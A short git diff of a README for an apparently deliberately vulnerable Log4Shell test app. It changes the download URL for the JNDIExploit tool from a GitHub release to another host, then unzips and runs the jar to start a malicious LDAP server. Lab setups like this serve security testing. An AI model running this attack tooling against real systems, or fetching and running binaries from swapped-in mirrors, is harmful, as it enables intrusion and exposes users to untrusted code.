diff --git a/README.md b/README.md index fda0f0b..3eaccaf 100644 --- a/README.md +++ b/README.md @@ -24,7 +24,7 @@ docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shel * Use [JNDIExploit](https://github.com/zzwlpx/JNDIExploit) to spin up a malicious LDAP server ```bash -wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip +wget https://gitea.avc.cx/borekon/log4shell-vulnerable-app/raw/branch/main/JNDIExploit.v1.2.zip unzip JNDIExploit.v1.2.zip java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888 ```